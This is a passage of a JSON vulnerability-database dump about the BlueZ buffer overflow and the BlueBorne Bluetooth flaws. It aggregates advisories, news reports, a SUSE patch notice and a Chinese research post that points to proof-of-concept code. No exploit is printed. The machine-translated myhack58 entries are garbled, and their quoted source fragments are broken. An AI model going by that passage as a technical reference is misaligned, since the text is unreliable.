\n`parse_line()` function used in some userland utilities contains a buffer overflow vulnerability.\n\n ## Impact\n\nAn attacker who can access the product may execute arbitrary code.\n\n ## Solution\n\n**Update the Software** \nUpdate to the latest version according to the information provided by the developer.\n\n ## Products Affected\n\n * BlueZ 5.41 and earlier\n", "edition": 5, "modified": "2016-12-22T00:00:00", "published": "2016-12-22T00:00:00", "id": "JVN:38755305", "href": "http://jvn.jp/en/jp/JVN38755305/index.html", "title": "JVN#38755305: BlueZ userland utilities vulnerable to buffer overflow", "type": "jvn", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2018-01-27T10:06:57", "bulletinFamily": "info", "cvelist": ["CVE-2017-1000250", "CVE-2017-0785", "CVE-2017-1000251"], "description": "[](<https://3.bp.blogspot.com/-o2j3I7E5YEc/Wg1NXN0UwCI/AAAAAAAAuwo/OdiSuaq6xcAqy96SVehGkhc_VYMGX7gfgCLcBGAs/s1600/amazon-alexa-hacking-bluetooth.png>)\n\nRemember BlueBorne? \n \nA series of recently disclosed [critical Bluetooth flaws](<https://thehackernews.com/2017/09/blueborne-bluetooth-hacking.html>) that affect billions of Android, iOS, Windows and Linux devices have now been discovered in millions of AI-based voice-activated personal assistants, including **Google Home** and **Amazon Echo**. \n \nAs estimated during the discovery of this devastating threat, several IoT and smart devices whose operating systems are often updated less frequently than smartphones and desktops are also vulnerable to BlueBorne. \n \nBlueBorne is the name given to the sophisticated attack exploiting a total of eight Bluetooth implementation vulnerabilities that allow attackers within the range of the targeted devices to run malicious code, steal sensitive information, take complete control, and launch man-in-the-middle attacks. \n \n**What's worse? 
**Triggering the [BlueBorne exploit](<https://thehackernews.com/2017/09/blueborne-bluetooth-hacking.html>) doesn't require victims to click any link or open any file\u2014all without requiring user interaction. Also, most security products would likely not be able to detect the attack. \n \nWhat's even scarier is that once an attacker gains control of one Bluetooth-enabled device, he/she can infect any or all devices on the same network. \n \nThese Bluetooth vulnerabilities were patched by Google for Android in September, [Microsoft for Windows](<https://thehackernews.com/2017/09/windows-zero-day-spyware.html>) in July, Apple for iOS one year before disclosure, and Linux distributions also shortly after disclosure. \n \nHowever, many of these 5 billion devices are still unpatched and open to attacks via these flaws. \n \n\n\n### 20 Million Amazon Echo & Google Home Devices Vulnerable to BlueBorne Attacks\n\nIoT security firm Armis, who initially discovered this issue, has now [disclosed](<https://www.armis.com/blueborne-cyber-threat-impacts-amazon-echo-google-home/>) that an estimated 20 million Amazon Echo and Google Home devices are also vulnerable to attacks leveraging the BlueBorne vulnerabilities. \n \nIf I split, around 15 million Amazon Echo and 5 million Google Home devices sold across the world are potentially at risk from BlueBorne. \n \nAmazon Echo is affected by the following two vulnerabilities: \n\n\n * A remote code execution vulnerability in the Linux kernel (CVE-2017-1000251)\n * An information disclosure flaw in the SDP server (CVE-2017-1000250)\nSince different Echo's variants use different operating systems, other Echo devices are affected by either the vulnerabilities found in Linux or Android. \n \nWhereas, Google Home devices are affected by one vulnerability: \n\n\n * Information disclosure vulnerability in Android's Bluetooth stack (CVE-2017-0785)\nThis Android flaw can also be exploited to cause a denial-of-service (DoS) condition. 
\n \nSince Bluetooth cannot be disabled on either of the voice-activated personal assistants, attackers within the range of the affected device can easily launch an attack. \n \nArmis has also published a proof-of-concept (PoC) video showing how they were able to hack and manipulate an Amazon Echo device. \n \nThe security firm notified both Amazon and Google about its findings, and both companies have released patches and issued automatic updates for the Amazon Echo and Google Home that fixes the BlueBorne attacks. \n \nAmazon Echo customers should confirm that their device is running v591448720 or later, while Google has not made any information regarding its version yet.\n", "modified": "2017-11-16T08:43:47", "published": "2017-11-15T21:43:00", "id": "THN:4141386ABD9B9D1290E4A6EAD271B02B", "href": "https://thehackernews.com/2017/11/amazon-alexa-hacking-bluetooth.html", "type": "thn", "title": "Bluetooth Hack Affects 20 Million Amazon Echo and Google Home Devices", "cvss": {"score": 8.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:17:55", "bulletinFamily": "info", "cvelist": ["CVE-2017-1000250", "CVE-2017-0781", "CVE-2017-0785", "CVE-2017-1000251", "CVE-2017-8628", "CVE-2017-0783", "CVE-2017-0782"], "description": "[](<https://3.bp.blogspot.com/-UzPaOsWrdHE/WbgJXlIi7iI/AAAAAAAAAHg/YXxzWHRUcWcmye1sPmhjHm8FFq5DMTY6ACLcBGAs/s1600/Bluetooth-blueborn-hacking.png>)\n\nIf you are using a Bluetooth enabled device, be it a smartphone, laptop, smart TV or any other IoT device, you are at risk of malware attacks that can carry out remotely to take over your device even without requiring any interaction from your side. 
\n \nSecurity researchers have just [discovered](<https://www.armis.com/blueborne/>) total 8 zero-day vulnerabilities in Bluetooth protocol that impact more than 5.3 Billion devices\u2014from Android, iOS, Windows and Linux to the Internet of things (IoT) devices\u2014using the short-range wireless communication technology. \n \nUsing these vulnerabilities, security researchers at IoT security firm Armis have devised an attack, dubbed **BlueBorne**, which could allow attackers to completely take over Bluetooth-enabled devices, spread malware, or even establish a \"man-in-the-middle\" connection to gain access to devices' critical data and networks without requiring any victim interaction. \n \nAll an attacker need is for the victim's device to have Bluetooth turned on and obviously, in close proximity to the attacker's device. Moreover, successful exploitation doesn't even require vulnerable devices to be paired with the attacker's device. \n \n\n\n### BlueBorne: Wormable Bluetooth Attack\n\n[](<https://3.bp.blogspot.com/-fsl3agXN11E/WbgKQy6rBfI/AAAAAAAAAHs/pMGATx8opQEgq4thDgwxtknC7Q1IpZ1vACLcBGAs/s1600/bluetooth-hacking.png>)\n\nWhat's more worrisome is that the BlueBorne attack could spread like the wormable WannaCry ransomware that emerged earlier this year and wrecked havoc by disrupting large companies and organisations worldwide. \n \nBen Seri, head of research team at Armis Labs, claims that during an experiment in the lab, his team was able to create a botnet network and install ransomware using the BlueBorne attack. \n\n\nHowever, Seri believes that it is difficult for even a skilled attacker to create a universal wormable exploit that could find Bluetooth-enabled devices, target all platform together and spread automatically from one infected device to others. \n\n\n> \"Unfortunately, this set of capabilities is extremely desireable to a hacker. 
BlueBorne can serve any malicious objective, such as cyber espionage, data theft, ransomware, and even creating large botnets out of IoT devices like the Mirai Botnet or mobile devices as with the recent [WireX Botnet](<https://thehackernews.com/2017/08/android-ddos-botnet.html>),\" Armis said. \n\"The BlueBorne attack vector surpasses the capabilities of most attack vectors by penetrating secure \"air-gapped\" networks which are disconnected from any other network, including the internet.\"\n\n \n\n\n### Apply Security Patches to Prevent Bluetooth Hacking\n\n \nThe security firm responsibly disclosed the vulnerabilities to all the major affected companies a few months ago\u2014including Google, Apple and Microsoft, Samsung and Linux Foundation. \n \nThese vulnerabilities include: \n \n\n\n * Information Leak Vulnerability in Android (CVE-2017-0785)\n * Remote Code Execution Vulnerability (CVE-2017-0781) in Android's Bluetooth Network Encapsulation Protocol (BNEP) service\n * Remote Code Execution Vulnerability (CVE-2017-0782) in Android BNEP's Personal Area Networking (PAN) profile\n * The Bluetooth Pineapple in Android\u2014Logical flaw (CVE-2017-0783)\n * Linux kernel Remote Code Execution vulnerability (CVE-2017-1000251)\n * Linux Bluetooth stack (BlueZ) information leak vulnerability (CVE-2017-1000250)\n * The Bluetooth Pineapple in Windows\u2014Logical flaw (CVE-2017-8628)\n * Apple Low Energy Audio Protocol Remote Code Execution vulnerability (CVE Pending)\nGoogle and Microsoft have already made security patches available to their customers, while Apple iOS devices running the most recent version of its mobile operating system (that is 10.x) are safe. \n\n\n> \u201cMicrosoft released security updates in July and customers who have Windows Update enabled and applied the security updates, are protected automatically. 
We updated to protect customers as soon as possible, but as a responsible industry partner, we withheld disclosure until other vendors could develop and release updates.\u201d \u2013 a Microsoft spokesperson said.\n\n**What's worse?** All iOS devices with 9.3.5 or older versions and over 1.1 Billion active Android devices running older than Marshmallow (6.x) are vulnerable to the BlueBorne attack. \n \nMoreover, millions of smart Bluetooth devices running a version of Linux are also vulnerable to the attack. Commercial and consumer-oriented Linux platforms (Tizen OS), as well as Linux devices running BlueZ or a kernel from 3.3-rc1 onward, are vulnerable to at least one of the BlueBorne bugs. \n \nAndroid users need to wait for security patches for their devices, as availability depends on their device manufacturers. \n \nIn the meantime, they can install \"[BlueBorne Vulnerability Scanner](<https://play.google.com/store/apps/details?id=com.armis.blueborne_detector>)\" app (created by Armis team) from Google Play Store to check if their devices are vulnerable to BlueBorne attack or not. 
If found vulnerable, you are advised to turn off Bluetooth on your device when not in use.\n", "modified": "2017-09-12T17:53:59", "published": "2017-09-12T05:52:00", "id": "THN:649BE2C710B04C213ECB85D95D5F229A", "href": "https://thehackernews.com/2017/09/blueborne-bluetooth-hacking.html", "type": "thn", "title": "BlueBorne: Critical Bluetooth Attack Puts Billions of Devices at Risk of Hacking", "cvss": {"score": 8.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2018-12-23T03:50:22", "bulletinFamily": "unix", "cvelist": ["CVE-2016-9800", "CVE-2016-9801"], "description": "This update for bluez fixes the following issues:\n\n Security issues fixed:\n\n - CVE-2016-9800: Fixed a buffer overflow in pin_code_reply_dump function\n (bsc#1013721)\n - CVE-2016-9801: Fixed a buffer overflow in set_ext_ctrl function\n (bsc#1013732)\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n", "edition": 1, "modified": "2018-12-23T00:12:30", "published": "2018-12-23T00:12:30", "id": "OPENSUSE-SU-2018:4259-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-12/msg00064.html", "title": "Security update for bluez (moderate)", "type": "suse", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "myhack58": [{"lastseen": "2017-09-29T14:08:54", "bulletinFamily": "info", "cvelist": ["CVE-2017-1000250", "CVE-2017-0781", "CVE-2017-0785", "CVE-2017-1000251", "CVE-2017-0782"], "edition": 1, "description": "The other day, and armis burst a series of Bluetooth flaws, no war no perception of the receiving system can be a bit can be hacked, and essentially impact all of the Bluetooth equipment, the persecution of the immeasurable, can be seen here https://www.armis.com/blueborne/ to understand how it guards to be: just the phone turn on the Bluetooth, it can be a long moderation. 
Nowadays mobile phones are so many, the application of this flaws written worm of the object, then can be again is a mobile version of low with wannacry. We 360Vulpecker Team in the know to these coherent information, Blaster stops the follow-up elucidating it. armis gives them the whitepaper, on the Bluetooth architecture, and the few flaws of elucidating possible to say that the exception is too small, the first film hair. No they did not give out these flaws of the PoC or is the exp, just to give a for Android\u201cBlueBorne detection app\", what, then the inverse of this invention is only to detect a system patch date. So I picked up a wave \u7259\u6167, these few flaws then elucidating a bit, then taking poc to write out: \n* CVE-2017-1000250 Linux bluetoothd process information leakage \n* CVE-2017-1000251 Linux kernel-stack overflow \n* CVE-2017-0785 Android com. android. bluetooth the process of information leakage \n* CVE-2017-0781 Android com. android. bluetooth process stack overflow \n* CVE-2017-0782 Android com. android. bluetooth process stack overflow \nThe above PoC code is in \nhttps://github.com/marsyy/littl_tools/tree/master/bluetooth \nBecause it is because of these few flaws only from the zero beginning to engage the Bluetooth, so it should be some elucidating not in place for the premises, also Please the way the big cattle shows. \n0x01 Bluetooth architecture and code spread \nHere the first should be dishing out armis of the paper in the figure: \n! [](/Article/UploadPic/2017-9/201792913526931. png? www. myhack58. com) \nFigure on the Bluetooth of each structured stakeholder DESCRIPTION is very detailed, not we're here temporarily just need to care so a few layers: HCI, L2CAP, AND BNEP, with the SDP. BNEP and SDP is more than the lower offices, the HCI at the bottom, indirect and Bluetooth equipment. And bearing in Bluetooth-do and the underlying equipment between the bridges, also is the L2CAP layer. 
Each layer has its agreements, the provisions of the data organization of the layout, all the layers of the data packet combined together, is a complete Bluetooth package a SDP packet as an example: the \n! [](/Article/UploadPic/2017-9/201792913526181. png? www. myhack58. com) \nWhile the provisions of the agreement of the architecture is the figure stated, but the specific implementation is divisive, Linux with the BlueZ, and now of Android with BlueDroid, but also for both architectures say The code of the specific spread. \nBlueZ \nIn Linux, using the BlueZ architecture, by the bluetoothd to supply BNEP,SDP these compare to the lower offices, and the L2CAP layer is on the inner core outside. To deal with BlueZ We of the SDP and L2CAP uncomparable to elucidating the. \n1, to achieve the SDP-do the code in the code directory/src/sdp, this sdp-client. c is it the client, the sdp-server. c is it do end. We're elucidating the flaws are long flaws, to is results are out in-do-end outside, let's focus on the Deposit dependents-do end. And do end the focus of the code, it should be Is it butt by the packet disposal process, this process by the sdp-request. c to achieve. When the L2CAP layer SDP data, will trigger the sdp-server. c io_session_event function to obtain the data packet, by the sdp-request. c The handle_request function dispose(how to dispose of, the subsequent flaws in elucidating the time and then tell): a \nstatic gboolean io_session_event(GIOChannel *chan, GIOCondition cond, gpointer data) \n{ \n... \nlen = recv(sk, &hdr, sizeof(sdp_pdu_hdr_t), MSG_PEEK); //get the SDP header data, to obtain the SDP data giant \nif (len int) len sizeof(sdp_pdu_hdr_t)) { \nsdp_svcdb_collect_all(sk); \nreturn FALSE; \n} \n\nsize = sizeof(sdp_pdu_hdr_t) + ntohs(hdr. plen); \nbuf = malloc(size); \nif (! buf) \nreturn TRUE; \n\nlen = recv(sk, buf, size, 0); //get the complete data packet \n... 
\nhandle_request(sk, buf, len); \n\nreturn TRUE; \n} \n2, The L2CAP layer of code in the kernel, here I am to Linux 4.2.8 of this code, for example. the l2cap layer is important from /net/bluetooth/l2capcore. c and/net/bluetooth/l2cap_sock. c to achieve. l2cap_core. c implements the L2CAP agreement of important content, l2cap_sock. c via the process of registering sock agreements supplied to this layer for the userspace interface. Strange we care a L2CAP butt by the data packet after the disposal process, the L2CAP data by the HCI layer transmission snapped past, in hci_core. c hci_rx_work function \nstatic void hci_rx_work(struct work_struct *work) \n{ \n\nwhile ((skb = skb_dequeue(&hdev->rx_q))) { \n/* Send copy to monitor */ \nhci_send_to_monitor(hdev, skb); \n\n... \nswitch (bt_cb(skb)->pkt_type) { \ncase HCI_EVENT_PKT: \nBT_DBG(\"%s Event packet\", hdev->name); \nhci_event_packet(hdev, skb); \nbreak; \n\ncase HCI_ACLDATA_PKT: \nBT_DBG(\"%s ACL data packet\", hdev->name); \nhci_acldata_packet(hdev, skb); \n\n\n**[1] [[2]](<89526_2.htm>) [[3]](<89526_3.htm>) [[4]](<89526_4.htm>) [[5]](<89526_5.htm>) [[6]](<89526_6.htm>) [[7]](<89526_7.htm>) [[8]](<89526_8.htm>) [[9]](<89526_9.htm>) [[10]](<89526_10.htm>) [next](<89526_2.htm>)**\n", "modified": "2017-09-29T00:00:00", "published": "2017-09-29T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2017/89526.htm", "id": "MYHACK58:62201789526", "title": "BlueBorne Bluetooth flaws vulnerability bug depth research and PoC-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 8.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-13T19:14:23", "bulletinFamily": "info", "cvelist": ["CVE-2017-1000250", "CVE-2017-0781", "CVE-2017-0785", "CVE-2017-8628", "CVE-2017-0783", "CVE-2017-0782"], "edition": 1, "description": "If you use a Bluetooth-enabled device, whether smartphone, laptop, or Smart TV, Smart Car, or other IoT devices, 
have to be careful. Recent researchers found the Bluetooth Protocol, 8 0-day vulnerabilities, of which 3 are classified as severity level. These vulnerabilities may affect the 53 million smart devices, Android, iOS, Windows, Linux, system devices, and IoT devices, etc. as long as the use of Bluetooth technology, it is possible to caught. \n! [](/Article/UploadPic/2017-9/2017913204432802. png? www. myhack58. com) \nArmis companies, a researcher will use this 8 a vulnerability named BlueBorne it. Hackers can exploit these vulnerabilities to initiate a remote attack that does not require any user interaction will be able to take over the equipment, spread malicious programs or even man in the middle attacks, the access network device and obtain the device key data. \nAs long as your device open Bluetooth, and in the hack device of Bluetooth connection range, the hacker will be able to attack, even without a successful connection. \nHaving a worm propagation characteristics, can have a serious impact \nThe researchers found that BlueBorne has worm propagation characteristics, can be like WannaCry as the worldwide spread rapidly, disrupting the company, the organization's network. Armis lab, a research group leader Ben Seri represents, in the study of these vulnerabilities when they find out you can use BlueBorne create a botnet, and install ransomware. But he also believes that highly skilled attackers are very difficult to exploit these vulnerabilities to initiate a global worm attack, because at the same time to find all Bluetooth-enabled devices, at the same time for all the platform to initiate attacks, and the use of an infected device to automatically a wide range of spread, these three points are very difficult to achieve. 
\nHowever, BlueBorne can be used for network monitoring, data theft, extortion, and even the use of IoT devices create is similar to Mirai a large botnet, or use your mobile device to create similar to the WireX botnet and other malicious activity, the harm can not be ignored. \nFirst, spread through the air, making the attacks more infectious and spread effortlessly.; and \nSecond, BlueBorne attacks can bypass current security measures, and not to be found, because the traditional method does not guard against airborne threats. Airborne assault may also allow a hacker to\u201csecurity\u201dof an isolated network not connected to the Internet, nor connect to the Internet in any other device, which may endanger the industrial system, government agencies and critical infrastructure; \nFinally, with the traditional malicious software or attacks, this attack requires no user interaction, the user need not click on links or download suspicious files, don't need to take any action to start the attack. \n! [](/Article/UploadPic/2017-9/2017913204433877. png? www. myhack58. com) \nThe researchers said the vulnerability is by far the most serious Bluetooth vulnerability. Prior to the identification to the Bluetooth vulnerability exists only on the Protocol level, but BlueBorne was present in the implementation level, the ability to bypass a variety of authentication mechanisms, to achieve the the target device to completely take over. \nArmis reminder: be wary of the BlueBorne with physical devices combined attack. For example, a go to the Bank Parcel Delivery courier may carry a maliciously encoded Bluetooth device. Once he entered the Bank, and this device will just infect other people's devices, and let the attacker in the original security of the network to find the stronghold. 
\nWide impact; patch as soon as possible \nAccording to the researchers' disclosure, the 8 vulnerabilities are: \nAndroid Bluetooth Network Encapsulation Protocol (BNEP) remote code execution vulnerability (CVE-2017-0781) \nAndroid BNEP Personal Area Networking (PAN) profile remote code execution vulnerability (CVE-2017-0782) \nAndroid Bluetooth Pineapple logical vulnerability (CVE-2017-0783) \nAndroid information disclosure vulnerability (CVE-2017-0785) \nLinux kernel remote code execution vulnerability (CVE-2017-1000251) \nLinux Bluetooth stack (BlueZ) information disclosure vulnerability (CVE-2017-1000250) \nWindows Bluetooth Pineapple logical vulnerability (CVE-2017-8628) \nApple Low Energy Audio Protocol remote code execution vulnerability (CVE pending) \nOnce the vulnerabilities were discovered, the researchers promptly reported them to all potentially affected major vendors, including Google, Apple, Microsoft, Samsung and the Linux Foundation. The affected scope is as follows: \nAndroid: all Android versions of phones, tablets and wearable devices are subject to the four Android Bluetooth vulnerabilities above; Android devices that use only Bluetooth Low Energy are not affected. Google issued the related patches in its September security fixes. \nWindows: all Windows versions since Vista are affected. Microsoft says Windows Phone is not affected by BlueBorne. In fact, Microsoft quietly released a patch for the Windows Bluetooth Pineapple logical vulnerability (CVE-2017-8628) in July, but only disclosed the details with the September 12 fixes. 
\nLinux: all Linux devices running BlueZ are subject to the information disclosure vulnerability (CVE-2017-1000250); Linux kernel versions from 3.3-rc1 (released October 2011) onward are affected by the remote code execution vulnerability (CVE-2017-1000251); Samsung's Linux-based Tizen system is also affected; \niOS: all iPhone, iPad and iPod devices on iOS 9.3.5 and earlier, and Apple TV 7.2.2 and earlier, are affected. iOS 10 fixes these vulnerabilities. \nAccording to Armis's estimates, about 2 billion devices, roughly 40% of all affected devices, cannot be patched because they run versions that are too old and no longer supported. \nGoogle and Microsoft have already released patches that users can download. Apple's latest mobile release, iOS 10.x, is not affected. \nA Microsoft spokesperson said: \nMicrosoft released security updates in July; customers who have Windows Update enabled and have applied the security updates are protected automatically. We updated to protect customers as soon as possible, but as a responsible industry partner we withheld disclosure until other vendors could develop and release updates. \nAndroid users can install the Armis-developed \u201cBlueBorne Vulnerability Scanner\u201d app from the Google Play Store to check whether their device is vulnerable to BlueBorne. If it is, turn Bluetooth off when it is not in use. \nArmis's vulnerability analysis report and attack demo videos for the different systems are linked below. 
to: \nReport original: http://go.armis.com/hubfs/BlueBorne%20Technical%20White%20Paper.pdf \n\n", "modified": "2017-09-13T00:00:00", "published": "2017-09-13T00:00:00", "id": "MYHACK58:62201789258", "href": "http://www.myhack58.com/Article/html/3/62/2017/89258.htm", "title": "Bluetooth agreement revealed eight major security vulnerability bug, capable of affecting fifty-three billion Bluetooth the efficacy of the equipment-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 0.0, "vector": "NONE"}}], "threatpost": [{"lastseen": "2018-10-06T22:53:11", "bulletinFamily": "info", "cvelist": ["CVE-2017-0781", "CVE-2017-0782", "CVE-2017-0783", "CVE-2017-0785", "CVE-2017-1000250", "CVE-2017-1000251", "CVE-2017-8628"], "description": "Researchers disclosed a bevy of Bluetooth vulnerabilities Tuesday that threaten billions of devices from Android and Apple smartphones to millions of printers, smart TVs and IoT devices that use the short-range wireless protocol.\n\nWorse, according to researchers at IoT security firm Armis that found the attack vector, the so-called \u201cBlueBorne\u201d attacks can jump from one nearby Bluetooth device to another wirelessly. It estimates that there are 5.3 billion devices at risk.\n\n\u201cIf exploited, the vulnerabilities could enable an attacker to take over devices, spread malware, or establish a \u2018man-in-the-middle\u2019 to gain access to critical data and networks without user interaction,\u201d according to the company. 
\u201cThe attack does not require the targeted device to be paired to the attacker\u2019s device, or even to be set on discoverable mode\u2026 since the Bluetooth process has high privileges on all operating systems, exploiting it provides virtually full control over the device.\u201d\n\nAs part of a coordinated disclosure, Armis said Google and Microsoft have already made patches available to their customers.\n\nIn a statement to Threatpost, Microsoft said: \u201cMicrosoft released security updates in July and customers who have Windows Update enabled and applied the security updates, are protected automatically. We updated to protect customers as soon as possible, but as a responsible industry partner, we withheld disclosure until other vendors could develop and release updates.\u201d\n\nMicrosoft\u2019s September Patch Tuesday disclosure lists one of the BlueBorne bugs (Bluetooth driver spoofing vulnerability \u2013 [CVE-2017-8628](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8628>)) as part of its security patches for the month.\n\nApple iOS devices running the most recent version of the OS (10.x) are safe, Armis said.\n\nAccording to researcher, only 45 percent of Android phones (960 million) are patchable, leaving 1.1 billion active Android devices older than Marshmallow (6.x) vulnerable.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/09/06222831/BlueBorne.png>)\n\nAlso vulnerable are millions of smart Bluetooth devices running a version of Linux. Commercial and consumer-oriented versions of Linux (Tizen OS) are vulnerable to one of the BlueBorne bugs as are Linux devices running BlueZ and 3.3-rc1 (released in October 2011). All Windows computers since Windows Vista are affected, according to the researchers. Microsoft Windows Phones are not impacted.\n\n\u201cThis set of capabilities are every hacker\u2019s dream. 
BlueBorne can serve any malicious objective, such as cyber espionage, data theft, ransomware, and even creating large botnets out of IoT devices like the Mirai Botnet or mobile devices as with the recent WireX Botnet,\u201d according to the company.\n\n\u201cThis means almost every computer, mobile device, smart TV or other IoT device running on one of these operating systems is endangered by at least one of the eight vulnerabilities. This covers a significant portion of all connected devices globally,\u201d researchers said.\n\nIn all, BlueBorne consists of eight related vulnerabilities, three of which are classified as critical. The vulnerabilities were found in the Bluetooth implementations in Android, Microsoft, Linux and iOS. They include:\n\n*Linux kernel RCE vulnerability \u2013 CVE-2017-1000251\n\n*Linux Bluetooth stack (BlueZ) information leak vulnerability \u2013 CVE-2017-1000250\n\n*Android information leak vulnerability \u2013 CVE-2017-0785\n\n*Android RCE vulnerabilities CVE-2017-0781 & CVE-2017-0782\n\n*The Bluetooth Pineapple in Android \u2013 Logical Flaw CVE-2017-0783\n\n*The Bluetooth Pineapple in Windows \u2013 Logical Flaw CVE-2017-8628\n\n*Apple Low Energy Audio Protocol RCE vulnerability \u2013 CVE Pending\n\nAn attack scenario includes an adversary identifying Bluetooth devices nearby and using commonly tools to identify the MAC address of vulnerable Bluetooth devices.\n\n\u201cBy probing the device, the attacker can determine which operating system his victim is using, and adjust his exploit accordingly. 
The attacker will then exploit a vulnerability in the implementation of the Bluetooth protocol in the relevant platform and gain the access he needs to act on his malicious objective,\u201d researchers wrote.\n\nAt this stage the attacker can choose to create a Man-in-the-Middle attack and control the device\u2019s communication, or take full control over the device and use it for a wide array of cybercriminal purposes, researchers stated.\n\nIn order to traverse from one Bluetooth device to the next, researchers say attackers would take advantage of a feature called Bluetooth Mesh, introduced with Bluetooth 5, which allows Bluetooth devices to interconnect and form a larger network with a more elaborate and dense structure.\n\n\u201cThe automatic connectivity of Bluetooth, combined with the fact that nearly all devices have Bluetooth enabled by default, make these vulnerabilities all the more serious and pervasive,\u201d they said. \u201cOnce a device is infected with malware, it can then easily broadcast the malware to other Bluetooth-enable devices in its vicinity, either inside an office or in more public locations.\u201d\n\n\u201cThese silent attacks are invisible to traditional security controls and procedures. Companies don\u2019t monitor these types of device-to-device connections in their environment, so they can\u2019t see these attacks or stop them,\u201d said Yevgeny Dibrov, CEO of Armis. \u201cThe research illustrates the types of threats facing us in this new connected age.\u201d\n\nBlueBorne attack types boil down to two types. One, where an adversary goes undetected and targets a specific devices to execute code with the objective to gaining access corporate networks, systems, and data. The second scenario involves creating a Bluetooth Pineapple to sniff or redirect traffic.\n\n\u201cThese vulnerabilities are the most serious Bluetooth vulnerabilities identified to date. 
Previously identified flaws found in Bluetooth were primarily at the protocol level. These new vulnerabilities are at the implementation level, bypassing the various authentication mechanisms, and enabling a complete takeover of the target device,\u201d according to researchers.\n\n(_This story was updated Sept. 12, 1:30pm ET to include Microsoft\u2019s comments and CVE details._)\n", "modified": "2017-09-20T19:57:35", "published": "2017-09-12T09:00:09", "id": "THREATPOST:73E805ED92B364393EDD601647FE122D", "href": "https://threatpost.com/wireless-blueborne-attacks-target-billions-of-bluetooth-devices/127921/", "type": "threatpost", "title": "Wireless 'BlueBorne' Attacks Target Billions of Bluetooth Devices", "cvss": {"score": 8.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T13:05:46", "description": "### General Overview\r\n\r\nArmis Labs revealed a new attack vector endangering major mobile, desktop, and IoT operating systems, including Android, iOS, Windows, and Linux, and the devices using them. The new vector is dubbed \u201cBlueBorne\u201d, as it spread through the air (airborne) and attacks devices via Bluetooth. Armis has also disclosed eight related zero-day vulnerabilities, four of which are classified as critical. BlueBorne allows attackers to take control of devices, access corporate data and networks, penetrate secure \u201cair-gapped\u201d networks, and spread malware laterally to adjacent devices. Armis reported these vulnerabilities to the responsible actors, and is working with them as patches are being identified and released.\r\n\r\nHere is a quick overview of how BlueBorne works:\r\nhttps://youtu.be/LLNtZKpL0P8\r\n\r\n#### Blueborne Brief Overview\r\n\r\nWhat Is BlueBorne?\r\nBlueBorne is an attack vector by which hackers can leverage Bluetooth connections to penetrate and take complete control over targeted devices. 
BlueBorne affects ordinary computers, mobile phones, and the expanding realm of IoT devices. The attack does not require the targeted device to be paired to the attacker\u2019s device, or even to be set on discoverable mode. Armis Labs has identified eight zero-day vulnerabilities so far, which indicate the existence and potential of the attack vector. Armis believes many more vulnerabilities await discovery in the various platforms using Bluetooth. These vulnerabilities are fully operational, and can be successfully exploited, as demonstrated in our research. The BlueBorne attack vector can be used to conduct a large range of offenses, including remote code execution as well as Man-in-The-Middle attacks.\r\n\r\nAdditional Information: Download our Technical White Paper on BlueBorne\r\n\r\n### What Is The Risk?\r\n\r\nThe BlueBorne attack vector has several qualities which can have a devastating effect when combined. By spreading through the air, BlueBorne targets the weakest spot in the networks\u2019 defense \u2013 and the only one that no security measure protects. Spreading from device to device through the air also makes BlueBorne highly infectious. Moreover, since the Bluetooth process has high privileges on all operating systems, exploiting it provides virtually full control over the device.\r\n\r\nUnfortunately, this set of capabilities is extremely desireable to a hacker. BlueBorne can serve any malicious objective, such as cyber espionage, data theft, ransomware, and even creating large botnets out of IoT devices like the Mirai Botnet or mobile devices as with the recent WireX Botnet. 
The BlueBorne attack vector surpasses the capabilities of most attack vectors by penetrating secure \u201cair-gapped\u201d networks which are disconnected from any other network, including the internet.\r\n\r\n### How Wide Is The Threat?\r\n\r\n#### The threat posed by the BlueBorne attack vector\r\nThe BlueBorne attack vector can potentially affect all devices with Bluetooth capabilities, estimated at over 8.2 billion devices today. Bluetooth is the leading and most widespread protocol for short-range communications, and is used by devices of all kinds, from regular computers and mobile devices to IoT devices such as TVs, watches, cars, and even medical appliances. The latest published reports show more than 2 billion Android, 2 billion Windows, and 1 billion Apple devices in use. Gartner reports that there are 8 billions connected or IoT devices in the world today, many of which have Bluetooth.\r\n\r\n### What Is New About BlueBorne?\r\n\r\n#### A new airborne attack vector\r\nBlueBorne concerns us because of the medium by which it operates. Unlike the majority of attacks today, which rely on the internet, a BlueBorne attack spreads through the air. This works similarly to the two less extensive vulnerabilities discovered recently in a Broadcom Wi-Fi chip by Project Zero and Exodus. The vulnerabilities found in Wi-Fi chips affect only the peripherals of the device, and require another step to take control of the device. With BlueBorne, b attackers can gain full control right from the start. Moreover, Bluetooth offers a wider attacker surface than WiFi, almost entirely unexplored by the research community and hence contains far more vulnerabilities.\r\n\r\nAirborne attacks, unfortunately, provide a number of opportunities for the attacker. First, spreading through the air renders the attack much more contagious, and allows it to spread with minimum effort. 
